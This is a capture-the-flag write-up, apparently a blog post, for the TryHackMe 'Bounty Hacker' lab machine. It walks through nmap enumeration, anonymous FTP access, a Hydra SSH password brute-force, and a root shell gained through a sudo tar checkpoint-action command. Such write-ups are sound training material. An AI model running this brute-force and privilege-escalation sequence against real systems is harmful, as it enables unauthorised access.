I"N<h2 id="description">Description:</h2>

<p>The Following Post is writeup of Bounty Hunter room of tryhackme <a href="https://tryhackme.com/room/cowboyhacker">https://tryhackme.com/room/cowboyhacker</a></p>

<table>
  <thead>
    <tr>
      <th style="text-align: left">Machine</th>
      <th style="text-align: left">Details</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: left">OS</td>
      <td style="text-align: left">linux</td>
    </tr>
    <tr>
      <td style="text-align: left">Rating</td>
      <td style="text-align: left">Easy</td>
    </tr>
    <tr>
      <td style="text-align: left">Creator</td>
      <td style="text-align: left">Sevuhl</td>
    </tr>
  </tbody>
</table>

<h2 id="summary">Summary:</h2>

<p>PortScan will give you 3 open ports 21,22 and 80. We got anoymous
  ftp server after login we will get a username and a passlist.
  bruteforce it using hydra and we will get user then sudo -l and GTFObins</p>

<h2 id="walkthrough">Walkthrough:</h2>

<h3 id="enumeration">Enumeration</h3>
<p>Lets start with nmap scan</p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
</pre></td><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> 10.10.87.183
<span class="go">PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.17.224
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
</span><span class="gp">22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">| ssh-hostkey:
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
</span><span class="gp">Service Info: OSs: Unix, Linux;</span><span class="w"> </span>CPE: cpe:/o:linux:linux_kernel
<span class="go">
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.28 seconds

</span></pre></td></tr></tbody></table></code></pre></div></div>
<h4 id="port-21">Port 21</h4>

<p>Start our enum with port 21
So we can see anonyomous listing is allowed</p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>ftp 10.10.87.183
<span class="go">
-rw-rw-r--    1 ftp      ftp           418 Jun 07 21:41 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07 21:47 task.txt
</span></pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="hydra">Hydra</h4>
<p>so from this files we can see user lin and let’s assume the locks.txt is passlist
and bruteforce ssh using hydra</p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="gp">└──╼ $</span>hydra <span class="nt">-l</span> lin <span class="nt">-P</span> locks.txt ssh://10.10.87.183
<span class="go">Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-31 02:15:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.87.183:22/
</span><span class="gp">[22][ssh] host: 10.10.87.183   login: lin   password: &lt;redacted&gt;</span><span class="w">
</span><span class="go">1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-31 02:15:10
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>Let’s check whether lin have sudo privs or not</p>

<h4 id="privesc">PrivEsc</h4>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="go">Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>Here we go so let’s try GTFObins</p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="go">sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

</span><span class="gp">root@bountyhacker:~/Desktop#</span><span class="w"> </span><span class="nb">id</span>
<span class="go">uid=0(root) gid=0(root) groups=0(root)
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>Rooted</p>
:ET